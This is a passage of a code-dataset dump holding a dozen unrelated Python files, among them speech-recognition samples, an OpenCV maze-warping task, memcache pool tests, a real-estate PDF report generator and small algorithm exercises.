speech.types.RecognitionConfig(\n        encoding=speech.enums.RecognitionConfig.AudioEncoding.LINEAR16,\n        sample_rate_hertz=8000,\n        language_code='ko-KR',\n        # Add this in the request to send metadata.\n        metadata=metadata)\n\n    operation = client.long_running_recognize(config, audio)\n\n    print('Waiting for operation to complete...')\n    response = operation.result(timeout=90)\n\n    for i, result in enumerate(response.results):\n        alternative = result.alternatives[0]\n        print('-' * 20)\n        print('First alternative of result {}'.format(i))\n        print('Transcript: {}'.format(alternative.transcript))\n        print('confidence: {}'.format(alternative.confidence))\n    # [END speech_transcribe_recognition_metadata_beta]\n\ndef transcribe_file_with_metadata():\n    \"\"\"Send a request that includes recognition metadata.\"\"\"\n    # [START speech_transcribe_recognition_metadata_beta]\n    client = speech.SpeechClient()\n\n    speech_file = 'C:/Users/웰컴저축은행/workspace/google_stt_poc/resources/샘플_4_개인정보삭제.wav'\n\n    with io.open(speech_file, 'rb') as audio_file:\n        content = audio_file.read()\n\n    # Here we construct a recognition metadata object.\n    # Most metadata fields are specified as enums that can be found\n    # in speech.enums.RecognitionMetadata\n    metadata = speech.types.RecognitionMetadata()\n    metadata.interaction_type = (\n        speech.enums.RecognitionMetadata.InteractionType.DISCUSSION)\n    metadata.microphone_distance = (\n        speech.enums.RecognitionMetadata.MicrophoneDistance.NEARFIELD)\n    metadata.recording_device_type = (\n        speech.enums.RecognitionMetadata.RecordingDeviceType.SMARTPHONE)\n    # Some metadata fields are free form strings\n    metadata.recording_device_name = \"Pixel 2 XL\"\n    # And some are integers, for instance the 6 digit NAICS code\n    # https://www.naics.com/search/\n    metadata.industry_naics_code_of_audio = 519190\n\n    audio = speech.types.RecognitionAudio(content=content)\n    config = speech.types.RecognitionConfig(\n        encoding=speech.enums.RecognitionConfig.AudioEncoding.LINEAR16,\n        sample_rate_hertz=8000,\n        language_code='ko-KR',\n        # Add this in the request to send metadata.\n        metadata=metadata)\n\n    response = 
client.recognize(config, audio)\n\n    for i, result in enumerate(response.results):\n        print('result : ', result)\n        alternative = result.alternatives[0]\n        print('-' * 20)\n        print('alternative : ', alternative)\n        print('First alternative of result {}'.format(i))\n        print('Transcript: {}'.format(alternative.transcript))\n        print('confidence: {}'.format(alternative.confidence))\n    # [END speech_transcribe_recognition_metadata_beta]\n\nif __name__ == '__main__':\n    #transcribe_file_with_metadata()\n    #transcribe_gcs_with_metadata('gs://dlab_ml/speech/ref/샘플_1_개인정보삭제.wav')\n    transcribe_gcs_with_metadata_return('gs://dlab_ml/speech/ref/샘플_1_개인정보삭제.wav', # storage uri\n                                        8000, # sample rate in hertz\n                                        speech.enums.RecognitionMetadata.InteractionType.DISCUSSION, # audio use case\n                                        522291, # industry category of the audio\n                                        speech.enums.RecognitionMetadata.MicrophoneDistance.NEARFIELD, # distance from the speaker to the microphone\n                                        speech.enums.RecognitionMetadata.OriginalMediaType.AUDIO, # whether the original media is audio or video\n                                        speech.enums.RecognitionMetadata.RecordingDeviceType.SMARTPHONE) # type of device that captured the audio","sub_path":"cloud_client/beta_snippets.py","file_name":"beta_snippets.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"293903705","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jan 14 11:59:36 2020\r\n\r\n@author: Tushar Saxena\r\n\"\"\"\r\n\r\nimport array as arr\r\na = arr.array('i', [1, 2, 3, 4, 5])\r\nwhile True:\r\n    print('1: Print Array')\r\n    print('2: Add Element')\r\n    print('3: Delete Element')\r\n    print('4: Exit')\r\n    \r\n    choice = int(input(\"Enter your choice.\"))\r\n    \r\n    if choice == 1:\r\n        for n in a:\r\n            print(n)\r\n    elif choice == 2:\r\n        val = int(input(\"Enter the value to be added!\"))\r\n        if isinstance(val, int):\r\n            a.append(val)\r\n    elif choice == 3:\r\n        val = a.pop()\r\n        print(\"Value popped: \", val)\r\n    elif choice == 4:\r\n        break\r\n    else:\r\n        print(\"Enter valid choice!\")","sub_path":"array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"447154107","text":"import sys\ntext = sys.stdin.readlines()\n# print(text)\ntextline = (''.join(text))\ntextlist = list(textline.split('\\n'))\nN = int(text[0])\nA = set()\nfor i in range(1, N+1):\n    A.add(i)\nB = list()\nfor line in textlist[1:]:\n    s = line.split()\n    if s[0] == 'HELP':\n        break\n    tmp = set()\n    for item in s:\n        tmp.add(int(item))\n    if len(A & tmp) * 2 > len(A):\n        print('YES')\n        A &= tmp\n    else:\n        print('NO')\n        A -= tmp\n    # B.append(temp)\n# print(*B)\n# for item in B:\n#     if len(A & item) * 2 > len(A):\n#         print('YES')\n#         A &= item\n#     else:\n#         print('NO')\n#         A -= item\n    # print(*sorted(A))\nprint(*sorted(A))\n","sub_path":"Week7/w7.8.py","file_name":"w7.8.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"317291499","text":"# %load q02_plot_matches_by_team/build.py\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.switch_backend('agg')\nipl_df = pd.read_csv('data/ipl_dataset.csv', index_col=None)\n\n\n# Solution\ndef plot_matches_by_team():\n    #create empty canvas to draw \n    fig = plt.figure()\n    # groupby batting team then count unique and select match_code (as it uniquely identifies matches played)\n    match_played = ipl_df.groupby('batting_team').nunique()['match_code']\n    #plotting bar\n    plt.bar(match_played.index, match_played)\n    #rotating x ticks by 
-90 for easy reading team name\n plt.xticks(rotation = -90)\n plt.show()\n \nplot_matches_by_team()\n\n\n\n","sub_path":"q02_plot_matches_by_team/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"558501972","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''Envía mensajes de portas'''\n__license__ = \"GPL\"\n__version__ = \"1.0.0\"\n__email__ = \"sirmcoil73@gmail.com\"\n__author__ = \"Mario Rodríguez\"\n\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\nimport time\nimport pyperclip as clipboard\nfrom pynput import mouse, keyboard\nfrom pynput.mouse import Button, Controller\nmouse = Controller()\nfrom pynput.keyboard import Key, Controller as Ctrlr2\nkeybrd = Ctrlr2()\nimport mysql.connector as mariadb\n\n\n\ndef on_press(key):\n try:\n print(key.char)\n\n except AttributeError:\n #print('special key {0} pressed'.format(key) )\n if (key==Key.cmd):\n pegarmsg()\n \ndef pegarmsg():\n total=0\n conn = mariadb.connect(host='localhost', port='3306', user='*****', password='*****', database='portas')\n cursor = conn.cursor()\n cursor2 = conn.cursor(prepared=True)\n try:\n cursor.execute(\"SELECT ID, TELEFONO, NOMBRE, APEP, APEM, IDCOP, ICCID FROM `t_portas` WHERE MENSAJE=0 ORDER BY ID LIMIT 10\")\n records=cursor.fetchall()\n for ID, TELEFONO, NOMBRE, APEP, APEM, IDCOP, ICCID in records:\n total+=1\n msgid=str(ID)\n msg='NOMBRE DEL PROMOTOR: HERNANDEZ CUEVAS VERONICA ALEJANDRA\\n'\n msg+='SUPERVISOR: VACANTE\\n'\n msg+='NUMERO A PORTAR: '+ str(TELEFONO)+'\\n'\n msg+='CLIENTE: '+str(NOMBRE)+' '+str(APEP)+' '+str(APEM)+'\\n'\n msg+='NUMERO SECUENCIAL: '+ str(IDCOP)+'\\n'\n msg+='SIM: '+ str(ICCID)+'\\n'\n msg+='COMPAÑÍA: MOVISTAR\\n'\n msg+='PROMOCIÓN: 50\\n'\n msg+='EQUIPO: NAUCALPAN\\n'\n msg+='COLOR: VERDE';\n clipboard.copy(msg)\n time.sleep(0.3)\n with keybrd.pressed(Key.ctrl):\n keybrd.press('v')\n keybrd.release('v')\n time.sleep(0.3)\n keybrd.press(Key.enter)\n keybrd.release(Key.enter)\n try:\n cursor2.execute(\"UPDATE `t_portas` SET MENSAJE=1 WHERE ID='\"+msgid+\"'\")\n conn.commit()\n #print(str(ID)+\"- \",cursor2.rowcount, \"fila afectada\")\n except mariadb.Error as error:\n print(str(ID)+\"-Error1: {}\".format(error))\n print(total)\n\n \n except mariadb.Error as error:\n print(\"Error2: {}\".format(error))\n\n finally:\n if(conn.is_connected() ):\n conn.close()\n print('TERMINADO')\n \n\n# Collect events until released\nwith keyboard.Listener(on_press=on_press) as listener:\n listener.join()\n","sub_path":"armado-mensajes.py","file_name":"armado-mensajes.py","file_ext":"py","file_size_in_byte":2473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"159422334","text":"'''\n*****************************************************************************************\n*\n* ===============================================\n* Nirikshak Bot (NB) Theme (eYRC 2020-21)\n* ===============================================\n*\n* This script is to implement Task 1B of Nirikshak Bot (NB) Theme (eYRC 2020-21).\n*\n* This software is made available on an \"AS IS WHERE IS BASIS\".\n* Licensee/end user indemnifies and will keep e-Yantra indemnified from\n* any and all claim(s) that emanate from the use of the Software or\n* breach of the terms of this agreement.\n*\n* e-Yantra - An MHRD project under National Mission on Education using ICT 
(NMEICT)\n*\n*****************************************************************************************\n'''\n\n# Team ID:			[ NB_887 ]\n# Author List:		[ Tanaya Gupte, Kallol Saha ]\n# Filename:		task_1b.py\n# Functions:		applyPerspectiveTransform, detectMaze, writeToCsv\n# 					[ Comma separated list of functions in this file ]\n# Global variables:\n# 					[ List of global variables defined in this file ]\n\n\n####################### IMPORT MODULES #######################\n## You are not allowed to make any changes in this section. ##\n## You have to implement this task with the three available ##\n## modules for this task (numpy, opencv, csv)               ##\n##############################################################\nimport numpy as np\nimport cv2\nimport csv\n##############################################################\n\n\n################# ADD UTILITY FUNCTIONS HERE #################\n## You can define any utility functions for your code.      ##\n## Please add proper comments to ensure that your code is   ##\n## readable and easy to understand.                         ##\n##############################################################\n\n\n\n\n\n\n##############################################################\n\n\ndef applyPerspectiveTransform(input_img):\n\n    \"\"\"\n    Purpose:\n    ---\n    takes a maze test case image as input and applies a Perspective Transform on it to isolate the maze\n\n    Input Arguments:\n    ---\n    `input_img` :   [ numpy array ]\n        maze image in the form of a numpy array\n\n    Returns:\n    ---\n    `warped_img` :  [ numpy array ]\n        resultant warped maze image after applying Perspective Transform\n\n    Example call:\n    ---\n    warped_img = applyPerspectiveTransform(input_img)\n    \"\"\"\n\n    warped_img = None\n\n    ############## ADD YOUR CODE HERE ##############\n    #Converting image to grayscale\n    gray = cv2.cvtColor(input_img, cv2.COLOR_BGR2GRAY)\n    #Obtaining height and width of the image\n    height, width = input_img.shape[:2]\n    if (height, width)== (512,512):\n        edged = cv2.Canny(gray, 30, 200)\n    else:\n        edged=cv2.threshold(gray, 245, 255, type=cv2.THRESH_BINARY)\n        edged= edged[1]\n        cv2.waitKey(0)\n\n    #Finding contours of the image:\n    contours = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[0]\n\n    #If contours contains more than 1 array, concatenating these into a single array\n    if len(contours) == 2:\n        s1= len(contours[0])\n        s2= len(contours[1])\n        C= [[[0,0]] for i in range((s1+s2)) ]\n        C= np.array(C)\n        C= C.reshape((s1+s2), 2)\n        cnt= contours[0]\n        C= np.concatenate((contours[0], contours[1]))\n    elif len(contours) == 3:\n        s1= len(contours[0])\n        s2= len(contours[1])\n        s3= len(contours[2])\n        C= [[[0,0]] for i in range((s1+s2+s3)) ]\n        C= np.array(C)\n        C= C.reshape((s1+s2+s3), 2)\n        cnt= contours[0]\n        C= np.concatenate((contours[0], contours[1], contours[2]))\n    else:\n        C= contours[0]\n\n\n    epsilon = 0.05*cv2.arcLength(C,True)\n    #Applying approxPolyDP() function to get desired contours\n    approx = cv2.approxPolyDP(C,epsilon,True)\n    a00=0\n    a01=0\n    a10=0\n    a11=0\n    a20=0\n    a21=0\n    a30=0\n    a31=0\n\n    #For given maze images:\n    if (height, width)== (512,512):\n        #Obtaining the 4 points to be used for perspective transform\n        for i in range(len(approx)):\n            #Eliminating points out of range\n            if any(approx[i][0]>505):\n                continue\n            #Obtaining the leftmost top corner point\n            if approx[i][0][0]<100:\n                if approx[i][0][1]<100:\n                    a00= approx[i][0][0]\n                    a01= approx[i][0][1]\n            #Obtaining the rightmost top corner point\n            if approx[i][0][0]>400:\n                if approx[i][0][1]<100:\n                    a10= approx[i][0][0]\n                    a11= approx[i][0][1]\n            #Obtaining the rightmost bottom 
corner point\n if approx[i][0][0]>400:\n if approx[i][0][1]>400:\n a20= approx[i][0][0]\n a21= approx[i][0][1]\n #Obtaining the lefmost bottom corner point\n if approx[i][0][0]<100:\n if approx[i][0][1]>400:\n a30= approx[i][0][0]\n a31= approx[i][0][1]\n #For images obtained from coppelia sim vision sensor:\n else:\n for i in range(len(approx)):\n if approx[i][0][0]<50:\n if approx[i][0][1]<50:\n a00= approx[i][0][0]\n a01= approx[i][0][1]\n if 800 \"y\" or \"n\": ')\n\n if choice == 'y':\n\n for file_num in range(1, 10):\n\n # path to image file\n img_file_path = img_dir_path + 'maze0' + str(file_num) + '.jpg'\n\n print('\\n============================================')\n print('\\nFor maze0' + str(file_num) + '.jpg')\n\n # path for csv output file\n csv_file_path = img_dir_path + 'maze0' + str(file_num) + '.csv'\n\n # read the image file\n input_img = cv2.imread(img_file_path)\n\n # get the resultant warped maze image after applying Perspective Transform\n warped_img = applyPerspectiveTransform(input_img)\n\n if type(warped_img) is np.ndarray:\n\n # get the encoded maze in the form of a 2D array\n maze_array = detectMaze(warped_img)\n\n if (type(maze_array) is list) and (len(maze_array) == 10):\n\n print('\\nEncoded Maze Array = %s' % (maze_array))\n print('\\n============================================')\n\n # writes the encoded maze array to the csv file\n writeToCsv(csv_file_path, maze_array)\n\n cv2.imshow('warped_img_0' + str(file_num), warped_img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n else:\n\n print('\\n[ERROR] maze_array returned by detectMaze function is not complete. Check the function in code.\\n')\n exit()\n\n else:\n\n print('\\n[ERROR] applyPerspectiveTransform function is not returning the warped maze image in expected format! 
Check the function in code.\\n')\n exit()\n\n else:\n\n print('')\n","sub_path":"task_4a_path_planning_windows/task_1b.py","file_name":"task_1b.py","file_ext":"py","file_size_in_byte":15171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"568771686","text":"import asyncio\nimport pytest\nfrom aiomcache.pool import MemcachePool, _connection\n\n\ndef test_pool_creation(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n assert pool.size() == 0\n assert pool._minsize == 1\n\n\n@pytest.mark.run_loop\ndef test_pool_acquire_release(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n conn = yield from pool.acquire()\n assert isinstance(conn.reader, asyncio.StreamReader)\n assert isinstance(conn.writer, asyncio.StreamWriter)\n pool.release(conn)\n\n\n@pytest.mark.run_loop\ndef test_pool_acquire_release2(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n reader, writer = yield from asyncio.open_connection(\n mcache_params['host'], mcache_params['port'], loop=loop)\n # put dead connection to the pool\n writer.close()\n reader.feed_eof()\n conn = _connection(reader, writer)\n yield from pool._pool.put(conn)\n conn = yield from pool.acquire()\n assert isinstance(conn.reader, asyncio.StreamReader)\n assert isinstance(conn.writer, asyncio.StreamWriter)\n\n\n@pytest.mark.run_loop\ndef test_pool_clear(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n conn = yield from pool.acquire()\n pool.release(conn)\n assert pool.size() == 1\n yield from pool.clear()\n assert pool._pool.qsize() == 0\n\n\n@pytest.mark.run_loop\ndef test_pool_is_full(mcache_params, loop):\n pool = MemcachePool(minsize=1, maxsize=2, loop=loop, **mcache_params)\n conn = yield from pool.acquire()\n\n # put garbage to the pool make it look like full\n mocked_conns = [_connection(0, 0), _connection(1, 1)]\n yield from pool._pool.put(mocked_conns[0])\n yield from pool._pool.put(mocked_conns[1])\n\n # try to return connection back\n assert pool.size() == 3\n pool.release(conn)\n assert pool.size() == 2\n\n\n@pytest.mark.run_loop\ndef test_acquire_dont_create_new_connection_if_have_conn_in_pool(mcache_params,\n loop):\n pool = MemcachePool(minsize=1, maxsize=5, loop=loop, **mcache_params)\n assert pool.size() == 0\n\n # Add a valid connection\n _conn = yield from pool._create_new_conn()\n yield from pool._pool.put(_conn)\n assert pool.size() == 1\n\n conn = yield from pool.acquire()\n assert conn is _conn\n assert pool.size() == 1\n","sub_path":"tests/pool_test.py","file_name":"pool_test.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"263222944","text":"# calculating final value of investment\ndef investment(initial, rate, time, number):\n print(initial*(1 + rate/number)**(time*number))\n\n\nc = input(\"enter initial amount: \")\nr = input(\"enter rate: \")\nt = input(\"enter time: \")\nn = input(\"enter number of times: \")\ntry:\n c = int(c)\n r = float(r)\n t = int(t)\n n = int(n)\nexcept:\n print(\"Enter numeric inputs\")\n exit()\ninvestment(c, r, t, n)\n","sub_path":"src/chapter4/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"75494397","text":"from sys import argv\nfrom 
urllib2 import urlopen, Request\nfrom re import findall\n\nprint_non_digits = False\n\n\ndef red(string):\n    return '\\033[91m'+string+'\\033[0m'\n\n\ndef digits(num):\n    num = list(num[::-1])\n    at_end = True\n    contains_digits = False\n    for i, char in enumerate(num):\n        if i+1 < len(num):\n            if at_end:\n                if char == num[i+1]:\n                    num[i] = red(num[i])\n                    num[i+1] = red(num[i])\n                    contains_digits = True\n                else:\n                    at_end = False\n    num = num[::-1]\n    if print_non_digits or contains_digits:\n        print(''.join(num))\n\n\ndef main(url):\n    req = Request(url)\n    req.add_header(\"User-Agent\", \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36\")\n    resp = urlopen(req)\n    data = resp.read()\n\n    posts = findall(r'javascript:quote\\(\\'(.*?)\\'\\)', data)\n    replies = posts[2:]\n    new_replies = []\n\n    for i in range(0, len(replies), 2):\n        new_replies.append(replies[i])\n    replies = new_replies\n\n    for reply in replies:\n        digits(reply)\n\nif __name__ == \"__main__\":\n    url = argv[1] if len(argv) > 1 else raw_input(\">\")\n    if len(argv) > 2:\n        print_non_digits = True if argv[2] == \"non\" else False\n    main(url)\n","sub_path":"digits.py","file_name":"digits.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"138101250","text":"from fpdf import FPDF\nimport os\n\n\nclass Reports:\n    def __init__(self, house, fo):\n        self.pdf = FPDF(unit='in', format='letter')\n        self.report_title = os.path.join('homes', house.address, f'{house.address}.pdf')\n        self.house = house\n        self.fo = fo\n        self.fo.down_unfinanced()\n\n    def initialize_report(self):\n        self.pdf.set_font('Arial', size=12)\n\n    def ammoritization(self, test=False):\n        situation = lambda x: 'test-' if x else ''\n        name = f'{situation(test)}{self.house.address}'\n        self.pdf.add_page()\n        self.pdf.cell(8,.5, txt=f'Amortization Schedule', ln=1, align='C')\n        self.pdf.image(os.path.join('homes',name,'graphs', 'amoritization.png'), x=1, y=1.5, w=6)\n        self.pdf.ln(6)\n        amr = self.fo.ammoritization\n        year5 = self.house.price*(1.05)**(5)-amr[60]\n        year5 = round(year5,2)\n        year10 = self.house.price*(1.05)**(10)-amr[120]\n        year10 = round(year10,2)\n        s1=f'On the assumption that the home value increases an average of 5% a year, the value of the home compared to the remaining balance on the loan will be {format(year5, \".2f\")}$.'\n        s2=f'On the same assumption, the value compared to the remaining loan balance after 10 years will be {format(year10, \".2f\")}$. Industry trends will all but guarantee a net gain in value after'\n        s3=f'a ten year period. 
If profitable, the investment exit plan will be to sell the home at the 5 year mark, but if future economic conditions are unfavorable to a sale at that time'\n        s4=f'the exit strategy will wait up to the ten year mark to sell the property'\n        self.pdf.multi_cell(8, .2, txt=f'{s1} {s2} {s3} {s4}', align='L')\n\n    def monthly_breakdown(self, test=False):\n        situation = lambda x: 'test-' if x else ''\n        name = f'{situation(test)}{self.house.address}'\n        self.pdf.add_page()\n        self.pdf.cell(8,.5, txt=f'Monthly Expenses', ln=1, align='C')\n        self.pdf.image(os.path.join('homes',name,'graphs', 'cost_dist.png'), x=1, y=1.5, w=6)\n        self.pdf.ln(6)\n        rent = self.house.rent\n        rooms = self.house.rooms\n        ccost = self.fo.closing_costs\n        coc = self.fo.coc\n        apr = self.fo.mo_rate\n        loan = self.fo.loan_amount\n        taxes = self.fo.home.tax\n        mcost = self.fo.mortgage+self.fo.home_insurance/12+rent*self.fo.management_fee+self.fo.home.tax\n        mcost = round(mcost, 2)\n\n        s1 = f'The market rate rent for this {rooms} bedroom home is {format(rent, \".2f\")}$ a month. The total monthly costs are estimated to be {format(mcost, \".2f\")}$, and the total monthly cashflow is estimated to be {format(rent-mcost, \".2f\")}$'\n        self.pdf.multi_cell(8, .2, txt=f'{s1}', align='L')\n\n    def interest_rate_breakdown(self, test=False):\n        situation = lambda x: 'test-' if x else ''\n        name = f'{situation(test)}{self.house.address}'\n        self.pdf.add_page()\n        self.pdf.cell(8,.5, txt=f'Rate Analysis', ln=1, align='C')\n        self.pdf.image(os.path.join('homes',name,'graphs', 'profit-rates.png'), x=1, y=1.5, w=6)\n        self.pdf.ln(6)\n        s1 = f'the house is profitable as shown above'\n        self.pdf.multi_cell(8,.2,txt=s1, align='L')\n\n    def summary(self, test=False):\n        self.pdf.add_page()\n        situation = lambda x: 'test-' if x else ''\n        name = f'{situation(test)}{self.house.address}'\n        self.pdf.ln(1)\n        self.pdf.cell(8, 0.5, txt=f'Summary for {name}', ln=1, align='C')\n        mcost = self.fo.mortgage+self.fo.home_insurance/12+self.house.rent*self.fo.management_fee+self.fo.home.tax\n        s1 = f'{self.house.address} is a {self.house.rooms} bedroom single family home on sale for a purchase price of {format(self.house.price, \".2f\")}$. This report shows the cash flow opportunities when purchasing this property with a 20% down payment of {format(self.fo.down_payment, \".2f\")}$ and a {self.fo.mo_rate*100}% APR loan of {format(self.fo.loan_amount, \".2f\")}$. 
At a market rate rent of {format(self.house.rent, \".2f\")}$ and monthly costs of {format(mcost, \".2f\")}$, this property is expected to produce a monthly cashflow of {format(self.house.rent-mcost, \".2f\")}$ and produce an annual cash on cash return of {round(self.fo.coc*100, 2)}%.'\n self.pdf.multi_cell(8, .2, txt=s1, align='L')\n\n def save_report(self, test=False):\n situation = lambda x: 'test-' if x else ''\n name = f'{situation(test)}{self.house.address}'\n report_name = os.path.join('homes', name, f'{self.house.address}.pdf')\n self.pdf.output(report_name)\n\n\n def create_report(self, test):\n self.initialize_report()\n self.summary()\n self.monthly_breakdown(test)\n self.ammoritization(test)\n self.interest_rate_breakdown(test)\n self.save_report(test)\n\n","sub_path":"reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"308486553","text":"\nimport numpy as np\n\nfrom numpy.testing import assert_array_equal, assert_array_almost_equal, \\\n assert_almost_equal\nfrom nose.tools import assert_raises, assert_true, assert_equal, \\\n assert_not_equal\n\nfrom sklearn.datasets.samples_generator import make_classification\n\nfrom lightning.primal_newton import PrimalNewton\n\nbin_dense, bin_target = make_classification(n_samples=200, n_features=100,\n n_informative=5,\n n_classes=2, random_state=0)\n\ndef test_primal_newton():\n clf = PrimalNewton(kernel=\"rbf\", gamma=0.1, random_state=0, verbose=0)\n clf.fit(bin_dense, bin_target)\n assert_almost_equal(clf.score(bin_dense, bin_target), 1.0)\n\n\ndef test_primal_newton_incremental():\n clf = PrimalNewton(kernel=\"rbf\", gamma=0.1, random_state=0, verbose=0,\n n_components=70)\n clf.fit(bin_dense, bin_target)\n assert_almost_equal(clf.score(bin_dense, bin_target), 1.0)\n assert_equal(clf.n_support_vectors(), 70)\n","sub_path":"lightning/tests/test_primal_newton.py","file_name":"test_primal_newton.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"224868138","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"\nCreated on 13.10.2010\n\n@author: vda\n\"\"\"\n\n\nfrom PyQt4 import QtCore, QtGui\n\n\nclass NuclideDisplayWidget(QtGui.QWidget):\n def __init__(self, parent=None, bg=\"#EFEFEF\", fg=\"#000000\"):\n QtGui.QWidget.__init__(self, parent)\n self.setMinimumSize(QtCore.QSize(100, 100))\n self.setMaximumSize(QtCore.QSize(100, 100))\n self.setGeometry(0, 0, 100, 100)\n \n self.bg_color = bg\n self.fg_color = fg\n \n self.set_data()\n \n def set_data(self, nuclide=None):\n \"\"\"\n Redraws widget using specified values.\n \n @param nuclide: object with predefined properties, i.e:\n class MyNuclide(object):\n def __init__(self):\n self.lat = 'Pb' #shortened latin name, stands for Plumbum\n self.a_mass = '999' #atomic mass\n self.a_num = '82' #atomic number\n \n widget = NuclideDisplayWidget()\n widget.set_data(MyNuclide)\n \n OR simplier version:\n \n class MyNuclide: pass\n nuclide = MyNuclide()\n nuclide.lat, nuclide.a_mass, nuclide.a_num = 'Pb', '999', '82'\n widget = NuclideDisplayWidget()\n widget.set_data(nuclide)\n \"\"\"\n if nuclide:\n self.lat = nuclide.lat\n self.a_mass = nuclide.a_mass\n self.a_num = nuclide.a_num\n else:\n self.lat = None\n self.a_mass = None\n self.a_num = None\n self.update()\n \n def reset(self):\n self.lat = None\n self.a_mass = None\n self.a_num = None\n self.update()\n \n def 
paintEvent(self, event):\n lat = '?' if not self.lat else self.lat\n a_mass = '?' if not self.a_mass else self.a_mass\n a_num = '?' if not self.a_num else self.a_num\n \n painter = QtGui.QPainter()\n painter.begin(self)\n \n painter.setBrush(QtGui.QBrush(QtGui.QColor(self.bg_color)))\n painter.setPen(QtCore.Qt.NoPen)\n painter.drawRect(0, 0, 100, 100)\n \n #painter.setPen(QtCore.Qt.black)\n painter.setPen(QtGui.QPen(QtGui.QColor(self.fg_color)))\n \n big_font = QtGui.QFont('Helvetica', 25, QtGui.QFont.DemiBold)\n big_font.setStyleHint(QtGui.QFont.Helvetica)\n big_font.setStyleStrategy(QtGui.QFont.PreferAntialias)\n painter.setFont(big_font) \n painter.drawText(event.rect(), QtCore.Qt.AlignCenter, lat)\n \n small_font = QtGui.QFont('Helvetica', 12, QtGui.QFont.Light)\n small_font.setStyleHint(QtGui.QFont.Helvetica)\n small_font.setStyleStrategy(QtGui.QFont.PreferAntialias)\n painter.setFont(small_font)\n \n fm = QtGui.QFontMetricsF(small_font)\n \n point = QtCore.QPointF(6, fm.ascent() + 3)\n painter.drawText(point, str(a_mass))\n \n point = QtCore.QPointF(6, self.height() - fm.ascent() / 2)\n painter.drawText(point, str(a_num))\n \n painter.end()\n \n","sub_path":"ui/widgets/nuclidedisplaywidget.py","file_name":"nuclidedisplaywidget.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"631478006","text":"import numpy as np\nimport pandas as pd\n\n#function to read a CSV file and manipulate its columns\ndef read_file():\n #Reading the data into a datframe\n data = pd.read_csv('Assign_1_10.csv')\n data1 = data\n data['Mean'] = data.mean(axis = 1) #Calculating mean of each row\n #Converting Data to mean-zero data\n for i in range(100):\n name = 'Vector'+str(i+1)\n data1[name] = data1[name] - data['Mean']\n sum = 0\n #Calculating Inner product of each Vector and adding them up\n for i in range(100):\n name = 'Vector'+str(i+1)\n arr = np.array([])\n arr = data1[name]\n sum = sum + np.dot(arr.transpose(),arr)\n j = i+1\n\n result = sum/j\n\n return result\n\ndef main():\n result = read_file()\n print(\"\\nThe required sum is: \",result)\n\nif __name__ == '__main__':\n main()\n","sub_path":"Assignment1/204102310 Satya Prakash Singh/Q11.py","file_name":"Q11.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"538576688","text":"import heapq\n\n\nclass Solution:\n def smallestDistancePair(self, nums: List[int], k: int) -> int:\n\n nums = sorted(nums)\n heap = []\n heapq.heapify(heap)\n\n for index, element in enumerate(nums[:-1]):\n second = nums[index + 1]\n distance = abs(second - element)\n\n heapq.heappush(heap, (distance, index, index + 1))\n\n for _ in range(k):\n\n distance, index_1, index_2 = heapq.heappop(heap)\n\n if index_2 < len(nums) - 1:\n new_distance = abs(nums[index_2 + 1] - nums[index_1])\n heapq.heappush(heap, (new_distance, index_1, index_2 + 1))\n\n return distance\n","sub_path":"719_Find_K-th_Smallest_Pair_Distance.py","file_name":"719_Find_K-th_Smallest_Pair_Distance.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"38870526","text":"from pygears.typing import Int, Uint, is_type\nfrom pygears.typing.visitor import TypingVisitorBase\n\n\nclass VGenTypeVisitor(TypingVisitorBase):\n def __init__(self, name, direction, basic_type='wire', hier=True):\n self.context = name\n self.basic_type = 
